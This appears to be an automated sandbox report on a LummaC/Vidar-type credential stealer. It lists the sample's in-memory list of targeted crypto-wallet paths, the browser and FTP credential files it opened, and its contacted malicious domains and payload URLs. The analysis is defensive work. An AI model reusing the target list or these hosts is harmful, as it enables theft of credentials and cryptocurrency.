Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC90C40 sqlite3_bind_zeroblob, 1_2_6CC90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC90D60 sqlite3_bind_parameter_name, 1_2_6CC90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB8EA0 sqlite3_clear_bindings, 1_2_6CBB8EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525478 Sample: file.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 44 treatynreit.site 2->44 46 steamcommunity.com 2->46 48 13 other IPs or domains 2->48 60 Multi AV Scanner detection for domain / URL 2->60 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 15 other signatures 2->66 9 file.exe 2->9         started        signatures3 process4 signatures5 76 Writes to foreign memory regions 9->76 78 Allocates memory in foreign processes 9->78 80 Injects a PE file into a foreign processes 9->80 12 MSBuild.exe 1 164 9->12         started        17 MSBuild.exe 9->17         started        19 WerFault.exe 20 16 9->19         started        21 WerFault.exe 21 16 9->21         started        process6 dnsIp7 50 cowod.hopto.org 45.132.206.251, 57018, 80 LIFELINK-ASRU Russian Federation 12->50 52 proxy.johnmccrea.com 141.98.233.156, 49745, 80 CH-NET-ASRO Russian Federation 12->52 54 playd.healthnlife.pk 147.45.44.104, 57015, 80 FREE-NET-ASFREEnetEU Russian Federation 12->54 32 C:\Users\user\AppData\Local\...\sql[1].dll, PE32 12->32 dropped 34 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->34 dropped 36 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->36 dropped 42 12 other files (8 malicious) 12->42 dropped 82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 12->84 86 Contains functionality to inject code into remote processes 12->86 88 6 other signatures 12->88 23 GCGHCBKFCF.exe 12->23         started        26 cmd.exe 1 12->26         started        56 beearvagueo.site 104.21.93.202, 443, 57019 CLOUDFLARENETUS United States 17->56 58 steamcommunity.com 104.102.49.254, 443, 57016 AKAMAI-ASUS United States 17->58 38 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->38 dropped 40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->40 dropped file8 signatures9 process10 signatures11 68 Machine Learning detection for dropped file 23->68 70 Writes to foreign memory regions 23->70 72 Allocates memory in foreign processes 23->72 74 Injects a PE file into a foreign processes 23->74 28 conhost.exe 26->28         started        30 timeout.exe 1 26->30         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
141.98.233.156
 proxy.johnmccrea.com Russian Federation
41011 CH-NET-ASRO true
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
147.45.44.104
 playd.healthnlife.pk Russian Federation
2895 FREE-NET-ASFREEnetEU false
45.132.206.251
 cowod.hopto.org Russian Federation
59731 LIFELINK-ASRU true
104.21.93.202
 beearvagueo.site United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
steamcommunity.com 104.102.49.254 true
playd.healthnlife.pk 147.45.44.104 true
cowod.hopto.org 45.132.206.251 true
beearvagueo.site 104.21.93.202 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 217.20.57.18 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
proxy.johnmccrea.com 141.98.233.156 true
treatynreit.site unknown unknown
mysterisop.site unknown unknown
chorusarorp.site unknown unknown
snarlypagowo.site unknown unknown
questionsmw.store unknown unknown
absorptioniw.site unknown unknown
abnomalrkmu.site unknown unknown
soldiefieop.site unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://proxy.johnmccrea.com//nss3.dll true
    		unknown
    abnomalrkmu.site true unknown
    http://playd.healthnlife.pk/ldms/a43486128347.exe true unknown
    absorptioniw.site true unknown
    treatynreit.site true unknown
    https://steamcommunity.com/profiles/76561199724331900 true
    • URL Reputation: malware
    		 unknown
    questionsmw.stor true
      		unknown
      http://proxy.johnmccrea.com//sql.dll true unknown
      http://proxy.johnmccrea.com/ true unknown
      http://proxy.johnmccrea.com//vcruntime140.dll true
        		unknown
        http://proxy.johnmccrea.com//softokn3.dll true
          		unknown
          http://proxy.johnmccrea.com//mozglue.dll true
            		unknown
            https://steamcommunity.com/profiles/76561199780418869 true
              		unknown
              chorusarorp.site true
                		unknown
                snarlypagowo.site true
                  		unknown
                  http://proxy.johnmccrea.com//msvcp140.dll true
                    		unknown
                    soldiefieop.site true
                      		unknown
                      http://cowod.hopto.org/ true
                        		unknown